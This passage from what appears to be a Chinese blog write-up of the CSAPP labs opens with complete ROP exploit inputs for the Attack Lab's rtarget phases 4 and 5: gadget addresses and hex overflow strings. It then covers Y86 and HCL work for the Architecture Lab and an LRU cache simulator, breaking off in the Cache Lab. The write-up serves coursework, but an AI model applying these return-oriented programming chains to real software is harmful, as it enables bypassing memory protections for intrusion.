ROP</h3><ul><li><code>rtarget</code>文件： 该文件用于ROP实验</li><li>该文件使用了<strong>栈随机化(ASLR)</strong> 与 <strong>栈不可执行(NX)</strong> 这两项技术来防止代码注入攻击，所以我们要使用 <strong>ROP</strong> 攻击来完成特定目的。</li><li><code>gets</code>输入点与函数返回地址存放位置之间的相对偏移仍是<code>40</code>。</li><li>下面是一张汇编与机器表示相关的表格<br><img src="/2020/07/csapp-lab-writeup/attack_lab_ref.png" alt="img"></li><li><strong>phase4</strong><ul><li><p>使用<code>objdump -S rtarget &gt; rtarget.s</code>指令将<code>rtarget</code>文件中的反汇编输出</p><blockquote><p>这里只截取了ROP可能会用到的部分汇编</p></blockquote>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0000000000401</span>9a7 &lt;addval_219&gt;:</span><br><span class="line">  <span class="number">4019</span>a7: <span class="number">8</span>d <span class="number">87</span> <span class="number">51</span> <span class="number">73</span> <span class="number">58</span> <span class="number">90</span>     lea    <span class="number">-0x6fa78caf</span>(%rdi),%eax</span><br><span class="line">  <span class="number">4019</span>ad: c3                    retq  </span><br><span class="line"></span><br><span class="line"><span class="number">0000000000401</span>9a0 &lt;addval_273&gt;:</span><br><span class="line">  <span class="number">4019</span>a0: <span class="number">8</span>d <span class="number">87</span> <span class="number">48</span> <span class="number">89</span> c7 c3     lea    <span class="number">-0x3c3876b8</span>(%rdi),%eax</span><br><span class="line">  <span class="number">4019</span>a6: c3                    retq</span><br></pre></td></tr></table></figure><ul><li><p>注意到函数<code>addval_219</code>中存在字节序列<code>58 90 c3</code>。其中<code>58</code>是<code>popq %rax</code>的机器表示，<code>90</code>是<code>nop</code>的机器表示，<code>c3</code>是<code>ret</code>的机器表示。这样的一小段字节序列可以用来将数据从栈上弹到寄存器<code>%rax</code>中。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">4019</span>ab: <span class="number">58</span>                    popq %rax</span><br><span class="line"><span class="number">4019</span>ac: <span class="number">90</span>                    nop</span><br><span class="line"><span class="number">4019</span>ad: c3                    retq</span><br></pre></td></tr></table></figure></li><li><p>同时，函数<code>addval_273</code>中存在字节序列<code>48 89 c7 c3</code>。其中<code>48 89 c7</code>就是<code>movq %rax, %rdi</code>的机器表示，<code>c3</code>是<code>ret</code>的机器表示。所以我们可以利用这个gadget将<code>%rax</code>中的数据拷贝到<code>%rdi</code>中</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">4019</span>a2: <span class="number">48</span> <span class="number">89</span> c7              movq %rax, %rdi</span><br><span class="line"><span class="number">4019</span>a5: c3                    retq</span><br></pre></td></tr></table></figure></li><li><p>上述的两条<code>popq rax</code>与<code>movq %rax, %rdi</code> 之间的配合，间接构成了一条<code>popq %rdi</code>指令，这样我们就可以设置寄存器<code>%rdi</code>，完成目的。实际效果如下：<br><img src="/2020/07/csapp-lab-writeup/rtarget_2_1.png" alt="img"></p></li></ul></li><li><p>综上所述，我们需要完成</p><ul><li>栈溢出跳转至<code>popq %rax</code></li><li>跳转至<code>movq %rax, %rdi</code></li><li>跳转至<code>touch2</code>函数（地址为<code>0x4017ec</code>）</li></ul><p>最终输入的数据如下</p>  <figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">ab 19 40 00 00 00 00 00</span><br><span class="line">fa 97 b9 59 00 00 00 00</span><br><span class="line">a2 19 40 00 00 00 00 00</span><br><span class="line">ec 17 40 00 00 00 00 00</span><br></pre></td></tr></table></figure><p>过关截图<br><img src="/2020/07/csapp-lab-writeup/rtarget_2_2.png" alt="img"></p></li></ul></li><li><strong>phase5</strong><ul><li><p>在这一关中，主要会用到如下几个函数</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0000000000401</span>a03 &lt;addval_190&gt;:</span><br><span class="line">  <span class="number">401</span>a03: <span class="number">8</span>d <span class="number">87</span> <span class="number">41</span> <span class="number">48</span> <span class="number">89</span> e0     lea    <span class="number">-0x1f76b7bf</span>(%rdi),%eax</span><br><span class="line">  <span class="number">401</span>a09: c3                    retq</span><br><span class="line"><span class="number">0000000000401</span>9d6 &lt;add_xy&gt;:</span><br><span class="line">  <span class="number">4019</span>d6: <span class="number">48</span> <span class="number">8</span>d <span class="number">04</span> <span class="number">37</span>           <span class="built_in">lea</span>    (%rdi,%rsi,<span class="number">1</span>),%rax</span><br><span class="line">  <span class="number">4019</span>da: c3                    retq</span><br><span class="line"><span class="number">0000000000401</span>9a0 &lt;addval_273&gt;:</span><br><span class="line">  <span class="number">4019</span>a0: <span class="number">8</span>d <span class="number">87</span> <span class="number">48</span> <span class="number">89</span> c7 c3     lea    <span class="number">-0x3c3876b8</span>(%rdi),%eax</span><br><span class="line">  <span class="number">4019</span>a6: c3                    retq</span><br></pre></td></tr></table></figure><p>其中分别提取出可利用的gadgets</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">401</span>a06: <span class="number">48</span> <span class="number">89</span> e0              movq %rsp, %rax</span><br><span class="line"><span class="number">401</span>a09: c3                    retq</span><br><span class="line"></span><br><span class="line"><span class="number">4019</span>d8: <span class="number">04</span> <span class="number">37</span>                 add <span class="number">0x37</span>, %al</span><br><span class="line"><span class="number">4019</span>da: c3                    retq</span><br><span class="line"></span><br><span class="line"><span class="number">4019</span>a2: <span class="number">48</span> <span class="number">89</span> c7              movq %rax, %rdi</span><br><span class="line"><span class="number">4019</span>a5: c3                    retq</span><br></pre></td></tr></table></figure><p>这些gadgets组合起来，可以获得指定偏移量的栈地址。如果将cookie字符串写入至此地址上，则可以达到 <strong>%rdi指向cookie字符串</strong> 这个目的，这样便可以通过当前关卡。</p><p>使用效果如下<br><img src="/2020/07/csapp-lab-writeup/rtaget_3_1.png" alt="img"></p></li><li><p>最后的输入数据如下</p><blockquote><p>注意第13行只有7个字节，并非笔者的疏忽</p></blockquote><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">06 1a 40 00 00 00 00 00</span><br><span class="line">d8 19 40 00 00 00 00 00</span><br><span class="line">a2 19 40 00 00 00 00 00</span><br><span class="line">fa 18 40 00 00 00 00 00</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31 31</span><br><span class="line">31 31 31 31 31 31 31</span><br><span class="line">35 39 62 39 39 37 66 61</span><br></pre></td></tr></table></figure><p>过关截图<br><img src="/2020/07/csapp-lab-writeup/rtarget_3_2.png" alt="img"></p></li></ul></li></ul><h2 id="4-Architecture-Lab">4. Architecture Lab</h2><h3 id="1-Part-A">1) Part A</h3><ul><li><p>这部分内容的工作目录为<code>arch-lab/sim/misc</code></p></li><li><p>在part A中，我们要分别用<code>Y86</code>汇编（注意不是<code>x86</code>）来手动编写位于<code>example.c</code>中的三个函数，以熟悉<code>Y86</code>的基本语法。该部分实现较为简单，依照CSAPP上的代码照葫芦画瓢即可。</p></li><li><p>其中，编译与运行<code>Y86</code>指令的shell脚本如下</p>  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">./yas $*.ys &amp;&amp; ./yis $*.yo</span><br></pre></td></tr></table></figure><p>执行效果如图所示<br><img src="/2020/07/csapp-lab-writeup/y86_disp.png" alt="img"></p></li><li><p><code>sum_list</code>函数的<code>Y86</code>汇编 - <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20A/sum.ys">github</a></p></li><li><p><code>rsum_list</code>函数的<code>Y86</code>汇编 - <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20A/rsum.ys">github</a></p><blockquote><p>注意递归调用函数时，需保存特定的寄存器到栈上，以便调用者使用。</p></blockquote></li><li><p><code>copy_block</code>函数的<code>Y86</code>汇编 - <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20A/copy.ys">github</a></p></li></ul><h3 id="2-Part-B">2) Part B</h3><ul><li><p>该部分内容主要是为SEQ处理器添加指令<code>iaddq</code>，所要修改的文件为<code>seq-full.hcl</code>，其工作目录为<code>arch-lab/sim/seq</code></p></li><li><p>由于<code>iaddq</code>指令既与运算操作相关，又与立即数处理相关，故该指令的功能添加可以参考<code>seq-full.hcl</code>中的<code>IOPQ</code>以及<code>IIRMOVQ</code>来编写。<br>以下摘抄了修改过的内容，完整内容请进入<a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20B/seq-full.hcl">github</a>，所有更改均以中文注释的形式写入其中。</p><blockquote><p>注：编写HCL时，使用汇编高亮是个不错的选择。</p></blockquote>  <figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"># Instruction code for iaddq instruction</span><br><span class="line">wordsig IIADDQ  <span class="string">&#x27;I_IADDQ&#x27;</span></span><br><span class="line"></span><br><span class="line"># 将IIADDQ指令加入到合法指令集合中</span><br><span class="line">bool instr_valid = icode <span class="keyword">in</span></span><br><span class="line">&#123; INOP, IHALT, IRRMOVQ, IIRMOVQ, IRMMOVQ, IMRMOVQ,</span><br><span class="line">        IOPQ, IJXX, ICALL, <span class="keyword">IRET</span>, IPUSHQ, IPOPQ, IIADDQ &#125;<span class="comment">;</span></span><br><span class="line"></span><br><span class="line"># IIADDQ指令 需要读入一个寄存器，因此要额外读取一个字节，故添加到该集合中</span><br><span class="line">bool need_regids =</span><br><span class="line">  icode <span class="keyword">in</span> &#123; IRRMOVQ, IOPQ, IPUSHQ, IPOPQ,</span><br><span class="line">        IIRMOVQ, IRMMOVQ, IMRMOVQ, IIADDQ  &#125;<span class="comment">;</span></span><br><span class="line"></span><br><span class="line"># IIADDQ指令 需要读入一个常数，因此添加到该集合中</span><br><span class="line">bool need_valC =</span><br><span class="line">  icode <span class="keyword">in</span> &#123; IIRMOVQ, IRMMOVQ, IMRMOVQ, IJXX, ICALL, IIADDQ &#125;<span class="comment">;</span></span><br><span class="line"></span><br><span class="line">## IIADDQ需要读取右寄存器的值，因此加入到该集合中</span><br><span class="line"><span class="built_in">word</span> srcB = [</span><br><span class="line">  icode <span class="keyword">in</span> &#123; IOPQ, IRMMOVQ, IMRMOVQ, IIADDQ  &#125; : rB<span class="comment">;</span></span><br><span class="line">  icode <span class="keyword">in</span> &#123; IPUSHQ, IPOPQ, ICALL, <span class="keyword">IRET</span> &#125; : RRSP<span class="comment">;</span></span><br><span class="line">  <span class="number">1</span> : RNONE<span class="comment">;  # Don&#x27;t need register</span></span><br><span class="line">]<span class="comment">;</span></span><br><span class="line"></span><br><span class="line"># 这里设置将结果写入IIADDQ指令的右寄存器中中</span><br><span class="line"><span class="built_in">word</span> dstE = [</span><br><span class="line">  icode <span class="keyword">in</span> &#123; IRRMOVQ &#125; &amp;&amp; Cnd : rB<span class="comment">;</span></span><br><span class="line">  icode <span class="keyword">in</span> &#123; IIRMOVQ, IOPQ, IIADDQ&#125; : rB<span class="comment">;</span></span><br><span class="line">  icode <span class="keyword">in</span> &#123; IPUSHQ, IPOPQ, ICALL, <span class="keyword">IRET</span> &#125; : RRSP<span class="comment">;</span></span><br><span class="line">  <span class="number">1</span> : RNONE<span class="comment">;  # Don&#x27;t write any register</span></span><br><span class="line">]<span class="comment">;</span></span><br><span class="line"></span><br><span class="line"># IIADDQ 指令的左操作数为读入的常数项</span><br><span class="line"><span class="built_in">word</span> aluA = [</span><br><span class="line">  icode <span class="keyword">in</span> &#123; IRRMOVQ, IOPQ &#125; : valA<span class="comment">;</span></span><br><span class="line">  icode <span class="keyword">in</span> &#123; IIRMOVQ, IRMMOVQ, IMRMOVQ, IIADDQ &#125; : valC<span class="comment">;</span></span><br><span class="line">  icode <span class="keyword">in</span> &#123; ICALL, IPUSHQ &#125; : -<span class="number">8</span><span class="comment">;</span></span><br><span class="line">  icode <span class="keyword">in</span> &#123; <span class="keyword">IRET</span>, IPOPQ &#125; : <span class="number">8</span><span class="comment">;</span></span><br><span class="line">  # Other instructions don<span class="string">&#x27;t need ALU</span></span><br><span class="line"><span class="string">];</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"># IIADDQ 指令的左操作数为读入的寄存器rB</span></span><br><span class="line"><span class="string">word aluB = [</span></span><br><span class="line"><span class="string">  icode in &#123; IRMMOVQ, IMRMOVQ, IOPQ, ICALL, </span></span><br><span class="line"><span class="string">          IPUSHQ, IRET, IPOPQ, IIADDQ &#125; : valB;</span></span><br><span class="line"><span class="string">    # 一个很有意思的点：将立即数存到特定寄存器的操作，就是先运算立即数 + 0，再将结果存入寄存器</span></span><br><span class="line"><span class="string">  icode in &#123; IRRMOVQ, IIRMOVQ &#125; : 0;</span></span><br><span class="line"><span class="string">  # Other instructions don&#x27;</span>t need ALU</span><br><span class="line">]<span class="comment">;</span></span><br><span class="line"></span><br><span class="line"># IIADDQ可能需要设置条件位，与IOPQ类似</span><br><span class="line">bool set_cc = icode <span class="keyword">in</span> &#123; IOPQ, IIADDQ &#125;<span class="comment">;</span></span><br></pre></td></tr></table></figure></li><li><p>当指令添加完成后，执行以下操作</p>  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 生成新的SEQ模拟器。如果make失败，可能需要修改makefile</span></span><br><span class="line">make clean &amp;&amp; make VERSION=full</span><br><span class="line"><span class="comment"># 可选操作，使用一个简单的例子测试iaddq指令</span></span><br><span class="line">./ssim -t ../y86-code/asumi.yo</span><br><span class="line"><span class="comment"># 可选操作，如果需要debug，则可以使用GUI形式的ssim来单步调试</span></span><br><span class="line">./ssim -g ../y86-code/asumi.yo</span><br><span class="line"><span class="comment"># 可选操作，使用微型测试集来测试除iaddq指令以外的其他指令。</span></span><br><span class="line"><span class="comment"># 这部分的目的主要有两点</span></span><br><span class="line"><span class="comment">#   1. 判断测试工具是否正常运行</span></span><br><span class="line"><span class="comment">#   2. 判断原先指令是否被用户无意间破坏</span></span><br><span class="line">(<span class="built_in">cd</span> ../y86-code; make testssim)</span><br><span class="line"><span class="comment"># 可选操作，使用大量测试集来测试除iaddq指令以外的其他指令</span></span><br><span class="line">(<span class="built_in">cd</span> ../ptest; make SIM=../seq/ssim)</span><br><span class="line"><span class="comment"># 使用大量测试集来测试iaddq指令</span></span><br><span class="line">(<span class="built_in">cd</span> ../ptest; make SIM=../seq/ssim TFLAGS=-i)</span><br></pre></td></tr></table></figure><p><code>iaddq</code>指令测试成功的截图如下<br><img src="/2020/07/csapp-lab-writeup/seq_test.png" alt="img"></p></li><li><p>编译过程中可能会出现一些错误，例如未找到头文件<code>tk.h</code>、某个结构体中没有成员<code>result</code>、程序链接失败等等。其解决方法如下：</p><ul><li><p>首先在执行<code>make</code>前，需要修改<code>makefile</code>中的部分内容</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 初始情况下 VERSION为std，如果只想生成full版本的ssim，可以直接修改VERSION</span></span><br><span class="line">VERSION=full</span><br><span class="line"><span class="comment"># GUIMODE情况下需要添加 -DUSE_INTERP_RESULT， 原因是tk中的某个结构体的某个成员已被弃用，</span></span><br><span class="line"><span class="comment"># 如需使用则必须添加宏定义USE_INTERP_RESULT</span></span><br><span class="line">GUIMODE=-DHAS_GUI -DUSE_INTERP_RESULT</span><br><span class="line"><span class="comment"># 修改使用的tk tcl版本，在每个参数后添加版本号。i.e. -ltk  =&gt;  -ltk8.6</span></span><br><span class="line">TKLIBS=-L/usr/lib -ltk8.6 -ltcl8.6</span><br><span class="line">TKINC=-isystem /usr/<span class="keyword">include</span>/tcl8.6</span><br><span class="line"></span><br><span class="line"><span class="comment"># ......</span></span><br></pre></td></tr></table></figure></li><li><p>其次，将<code>ssim.c</code>文件中的第844、845行注释掉即可</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* 第837行 */</span>   <span class="meta">#<span class="keyword">ifdef</span> HAS_GUI</span></span><br><span class="line">                <span class="comment">/* ... */</span></span><br><span class="line"><span class="comment">/* 第844行 */</span>   <span class="comment">//extern int matherr();</span></span><br><span class="line"><span class="comment">/* 第845行 */</span>   <span class="comment">//int *tclDummyMathPtr = (int *) matherr;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure></li></ul></li></ul><h3 id="3-Part-C">3) Part C</h3><ul><li><p>在当前部分中，我们需要修改<code>ncopy.ys</code>与<code>pipe-full.hcl</code>，以获得更高的执行效率</p></li><li><p>当代码修改完成后，执行以下命令</p>  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#! /bin/sh</span></span><br><span class="line"><span class="comment">#   1. make用于生成测试用例与seq模拟器，-s 安静模式</span></span><br><span class="line"><span class="comment">#   2. correctness.pl使用更高级别的测试来测试ncopy.ys的正确性</span></span><br><span class="line"><span class="comment">#   3. ./benchmark.pl为运行速度评分</span></span><br><span class="line"><span class="comment">#   4. 最后判断ncopy的y86汇编文件大小是否不超过1k bytes（超过1k字节则ncopy.ys不合格）</span></span><br><span class="line">make VERSION=full -s &amp;&amp; ./correctness.pl &amp;&amp; ./benchmark.pl &amp;&amp; ../misc/yas ncopy.ys &amp;&amp; ./check-len.pl &lt; ncopy.yo</span><br></pre></td></tr></table></figure></li><li><p>笔者所做的优化</p><ul><li>在<code>pipe-full.hcl</code>中实现<code>iaddq</code>指令，并替换<code>ncopy.ys</code>中所有可被<code>iaddq</code>替代的指令（包括其中一个操作数为立即数的<code>sub</code>指令）。<blockquote><p>此时CPE等于12.70</p></blockquote></li><li>将循环展开成<code>13、5、1</code>层数的三个不同循环。同时将 <strong>读取</strong> 与 <strong>存储</strong> 指令分开，减少 <strong>气泡</strong>(bubble)的插入或流水线的暂停。<blockquote><p>此时CPE等于8.84，分数为33.1/60.0</p></blockquote></li><li>由于笔者只是简单的将循环展开，并没有推敲更深层次的优化。故最终分数为33.1</li></ul></li><li><p><code>pipe-full.hcl</code>由于其添加流程与part B类似，故不再赘述，代码存于<a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20C/pipe-full.hcl">github</a>。<br><code>ncopy.ys</code>代码篇幅较大，存于<a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/4.%20Arch%20Lab/part%20C/ncopy.ys">github</a>中</p></li></ul><h2 id="5-Cache-Lab">5. Cache Lab</h2><h3 id="1-Part-A-2">1) Part A</h3><ul><li><p>在Part A中，我们需要仿造<code>csim-ref</code>，编写一个cache模拟器，该模拟器可以模拟在一系列的数据访问中cache的命中、不命中与牺牲行的情况，其中，需要牺牲行时，用LRU替换策略进行替换。</p></li><li><p>偷了个小懒，直接把csim-ref逆向出了源代码 - <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/5.%20Cache%20Lab/csim.c">github</a></p></li><li><p>Cache主体的数据结构如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="type">long</span> <span class="type">long</span> <span class="type">unsigned</span> <span class="type">mem_addr_t</span>;</span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">cache_line_t</span>&#123;</span><br><span class="line">    <span class="type">mem_addr_t</span> tag;</span><br><span class="line">    <span class="type">int</span> valid;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> lru; </span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">cache_line_t</span>* <span class="type">cache_set_t</span>;</span><br><span class="line"><span class="keyword">typedef</span> <span class="type">cache_set_t</span>* <span class="type">cache_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">cache_t</span> cache;</span><br></pre></td></tr></table></figure></li><li><p>每次获取数据时，都需要修改该数据中的LRU。同时，如果该数据并没有存放于Cache中，则需要根据LRU来驱逐某条Cache_line。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">accessData</span><span class="params">(<span class="type">mem_addr_t</span> addr)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">int</span> eviction_line;</span><br><span class="line">  <span class="comment">// 注意是无符号整数</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> eviction_lru = <span class="number">-1</span>;</span><br><span class="line">  eviction_line = <span class="number">0</span>;</span><br><span class="line">  <span class="type">mem_addr_t</span> tag = addr &gt;&gt; (s + b);</span><br><span class="line">  <span class="type">cache_set_t</span> cache_set = cache[(addr &gt;&gt; b) &amp; set_index_mask];</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 所需数据的cache_line编号</span></span><br><span class="line">  <span class="type">int</span> i;</span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; ; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="comment">// 如果把所有的cache_line全遍历完了还找不到所需的数据</span></span><br><span class="line">    <span class="keyword">if</span> ( i &gt;= E )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="comment">// 数据未命中</span></span><br><span class="line">      ++miss_count;</span><br><span class="line">      <span class="keyword">if</span> ( verbosity )</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;miss &quot;</span>);</span><br><span class="line">      <span class="comment">// 在一组cache_line中查找将被删除的cache_line</span></span><br><span class="line">      <span class="keyword">for</span> (<span class="type">int</span> ia = <span class="number">0</span>; ia &lt; E; ++ia )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="keyword">if</span> ( cache_set[ia].lru &lt; eviction_lru )</span><br><span class="line">        &#123;</span><br><span class="line">          eviction_line = ia;</span><br><span class="line">          eviction_lru = cache_set[ia].lru;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">      <span class="comment">// 如果当前这个要被删除的cache_line是valid</span></span><br><span class="line">      <span class="comment">// 即，这个要被替换数据的cache_line是一条之前读入的数据而不是空行</span></span><br><span class="line">      <span class="keyword">if</span> ( cache_set[eviction_line].valid )</span><br><span class="line">      &#123;</span><br><span class="line">        <span class="comment">// 删除数+1</span></span><br><span class="line">        ++eviction_count;</span><br><span class="line">        <span class="keyword">if</span> ( verbosity )</span><br><span class="line">          <span class="built_in">printf</span>(<span class="string">&quot;eviction &quot;</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="comment">// 模拟读入并覆盖数据到这个刚刚被删除（或本来是空行）的cache_line里</span></span><br><span class="line">      cache_set[eviction_line].valid = <span class="number">1</span>;</span><br><span class="line">      cache_set[eviction_line].tag = tag;</span><br><span class="line">      cache_set[eviction_line].lru = lru_counter++;</span><br><span class="line">      <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 查找cache中的数据</span></span><br><span class="line">    <span class="keyword">if</span> ( cache_set[i].tag == tag &amp;&amp; cache_set[i].valid )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// 如果找到数据了，自然就hit_count++</span></span><br><span class="line">  ++hit_count;</span><br><span class="line">  <span class="keyword">if</span> ( verbosity )</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;hit &quot;</span>);</span><br><span class="line">  cache_set[i].lru = lru_counter++;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h3 id="2-Part-B-2">2) Part B</h3><ul><li>在Part B中，我们需要编写一个实现矩阵转置的函数，并且使函数调用过程中对cache的不命中数miss尽可能少</li><li>测试程序所使用的cache模拟器的参数为<code>-S 5 -E 1 -B 